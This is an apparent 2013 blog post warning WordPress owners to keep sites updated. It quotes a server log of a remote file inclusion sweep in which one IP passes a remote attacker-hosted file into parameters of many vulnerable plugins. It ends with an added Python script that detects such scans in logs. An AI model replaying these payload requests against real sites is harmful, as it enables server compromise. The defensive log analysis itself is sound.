Reasons to keep your wp site up to date

Hi!

Just found this little script kiddie this morning on one of my sites:

94.199.51.7 - - [23/Apr/2013:05:03:50 -0700] “GET /wp-content/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1” 200 139 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:50 -0700] “GET /wp-includes/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1” 403 52322 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:52 -0700] “GET /wp-content/plugins/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1” 200 139 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:52 -0700] “GET /wp-content/includes/?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52322 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:54 -0700] “GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:55 -0700] “GET /wp-includes/functions.php?file=http://94.199.51.7/readme.txt? HTTP/1.1” 200 572 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:55 -0700] “GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:56 -0700] “GET /wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:58 -0700] “GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:03:59 -0700] “GET /wp-content/plugins/BackUp/Archive.php?bkpwp_plugin_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:00 -0700] “GET /wp-content/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:01 -0700] “GET /wp-content/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52322 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:03 -0700] “GET /wp-content/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:04 -0700] “GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:05 -0700] “GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52322 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:06 -0700] “GET /wp-content/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:07 -0700] “GET /wp-content/plugins/livesig/livesig-ajax-backend.php?$_POST[‘wp-root’]=http://94.199.51.7/readme.txt? HTTP/1.1” 200 52320 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:09 -0700] “GET /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:09 -0700] “GET /wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-content/plugins/enable-latex/core.php?url=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-includes/js/tinymce/plugins/spellchecker/includes/general.php?file=http://94.199.51.7/readme.txt? HTTP/1.1” 200 139 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:11 -0700] “GET /wp-content/plugins/wpeasystats/export.php?homep=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:11 -0700] “GET /wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-content/plugins/spellchecker/includes/general.php?file=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-content/plugins/wpeasystats/export.php?homep=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:10 -0700] “GET /wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:12 -0700] “GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:12 -0700] “GET /wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:11 -0700] “GET /wp-content/plugins/mailz/lists/config/config.php?wpabspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:11 -0700] “GET /wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:15 -0700] “GET /wp-includes/functions.php?file=http://94.199.51.7/readme.txt? HTTP/1.1” 200 572 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:15 -0700] “GET /wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php?_POST[“abspath”]=http://94.199.51.7/readme.txt? HTTP/1.1” 503 532 “http://mysite.org/” "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0"
94.199.51.7 - - [23/Apr/2013:05:04:15 -0700] “GET /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=http://94.199.51.7/readme.txt? HTTP/1.1” 200 17520 “http://mysite.org/” “Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0”

It’s an inventory of broken plugins. If your website is up to date, this won’t affect you, but if you’ve fallen asleep with your updates…

Yummy exploits delivered directly to your Admin Panel courtesy of wordpress.org

The default install tagline should be “Just another soon-to-be-exploited WordPress site”

I’ve been using http://wordpress.org/extend/plugins/automatic-updater/ to keep my plugins and themes up to date. Works like a champ :)
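A way to spot this kind of sweep in an access log, as an added example that is not part of the original posts: it flags clients that send URL-valued query parameters to several distinct paths, which is the pattern in the log at the top of the thread. The sample lines are constructed (documentation-range addresses, `example.org`), and the function names and the `min_paths` threshold are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl

# Constructed sample in Apache combined log format (not taken from a real server).
SAMPLE_LOG = '''\
203.0.113.7 - - [23/Apr/2013:05:03:50 -0700] "GET /wp-content/?_SERVER[DOCUMENT_ROOT]=http://203.0.113.7/readme.txt? HTTP/1.1" 200 139 "http://example.org/" "Mozilla/5.0"
203.0.113.7 - - [23/Apr/2013:05:03:54 -0700] "GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://203.0.113.7/readme.txt? HTTP/1.1" 200 52320 "http://example.org/" "Mozilla/5.0"
203.0.113.7 - - [23/Apr/2013:05:03:55 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=http%3A%2F%2F203.0.113.7%2Freadme.txt HTTP/1.1" 403 52322 "http://example.org/" "Mozilla/5.0"
198.51.100.20 - - [23/Apr/2013:05:10:02 -0700] "GET /wp-login.php?redirect_to=http://example.org/wp-admin/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.20 - - [23/Apr/2013:05:10:09 -0700] "GET /?s=plugins HTTP/1.1" 200 8112 "-" "Mozilla/5.0"
'''.splitlines()

# Captures: client IP, request target, response status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def remote_url_params(line):
    """Return (ip, path, status, [param names]) if the query carries remote URLs, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    path, _, query = target.partition('?')
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught as well.
    names = [k for k, v in parse_qsl(query, keep_blank_values=True) if REMOTE_RE.match(v)]
    return (ip, path, int(status), names) if names else None

def find_scanners(lines, min_paths=3):
    """Flag clients that send URL-valued parameters to at least min_paths distinct paths."""
    seen = defaultdict(lambda: {"paths": set(), "params": set(), "status": Counter()})
    for line in lines:
        hit = remote_url_params(line)
        if hit:
            ip, path, status, names = hit
            seen[ip]["paths"].add(path)
            seen[ip]["params"].update(names)
            seen[ip]["status"][status] += 1
    # A single URL-valued parameter (e.g. a login redirect) stays below the threshold.
    return {ip: d for ip, d in seen.items() if len(d["paths"]) >= min_paths}

if __name__ == "__main__":
    for ip, d in find_scanners(SAMPLE_LOG).items():
        print(ip, len(d["paths"]), "paths;", sorted(d["params"]), dict(d["status"]))
```

The status counts only show how the server answered each request; they do not show whether any script acted on the parameter.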